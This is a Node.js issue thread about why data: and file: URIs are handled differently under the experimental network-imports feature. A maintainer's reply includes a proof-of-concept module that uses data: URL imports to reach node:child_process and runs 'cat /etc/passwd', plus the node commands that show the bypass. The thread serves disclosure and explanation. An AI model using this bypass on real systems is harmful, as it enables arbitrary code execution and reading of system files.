Security question: Why are data: URIs and file: URIs treated differently in your security policy?

[eligrey]

Version

No response

Platform

No response

Subsystem

No response

What steps will reproduce the bug?

I noticed this bug report and asked @RafaelGSS why data: URIs are treated differently from file: URIs in the node.js security policy, as attackers can simply write to a file and then import it to achieve the same effect.

Rafael responded with the following, asking me to file an issue in this bug tracker instead of elaborating on X:

This vulnerability exposes a vulnerability according to Node.js threat model. I can expand more on that if you raise an issue.

But I certainly won't elaborate on a X thread :)

How often does it reproduce? Is there a required condition?

No response

What is the expected behavior? Why is that the expected behavior?

No response

What do you see instead?

N/A. I was requested by @RafaelGSS to use this issue reporting form.

Additional information

No response

[avivkeller]

@nodejs/security-wg
CC @RafaelGSS

[RafaelGSS]

So I couple of things first:

1. The report was disclosed limited, so that's explains why you can only read the summary:

A security flaw in Node.js allows a bypass of network import restrictions.
By embedding non-network imports in data URLs, an attacker can execute arbitrary code, compromising system security.
Verified on various platforms, the vulnerability is mitigated by forbidding data URLs in network imports.
Exploiting this flaw can violate network import security, posing a risk to developers and servers.

I will try to adjust it either way.

2. I believe your question is unrelated to the vulnerability itself. I will provide more details about the report, but I might not be the best person to explain our resolvers.

Imagine you have an HTTP server with two routes:

1. /indirect -> returns a

import childProcess from 'data:text/javascript,export { default } from "node:child_process"'
import http from 'data:text/javascript,export { default } from "node:http"'

console.log('BYPASSED')
const data = childProcess.execSync('cat /etc/passwd')

2. /direct -> returns a import fs from 'node:fs/promises'

While the /direct route produces the expected result:

$ node --experimental-network-imports --import 'http://127.0.0.1:9999/direct.mjs' --eval ''

Error [ERR_NETWORK_IMPORT_DISALLOWED]: import of 'node:fs/promises' by http://localhost:9999/direct.mjs is not supported: only relative and absolute specifiers are supported.

the /indirect is a bypass of this feature's expectations

$ node --experimental-network-imports --import 'http://127.0.0.1:9999/indirect.mjs' --eval ''
BYPASS

[RafaelGSS]

Also note, that we are discussing removing this feature entirely #53822.

[eligrey]

Your response does not acknowledge my question about file: URIs.

I am repeating my question: Why are data: URIs treated differently from file: URIs? Attackers can simply write to a file and then import it to achieve the same effect.

If you look at the docs for network imports, there's a special restriction.

Cannot load non-network dependencies

These modules cannot access other modules that are not over http: or https:.

The intention is that file: and node: imports will fail under a network import. This means a network import has no way to access the file system and so could not write to a file.

What seems to have happened here is embedding the prohibited import in a data: URL made it work, and gave access to the file system etc which shouldn't have been possible.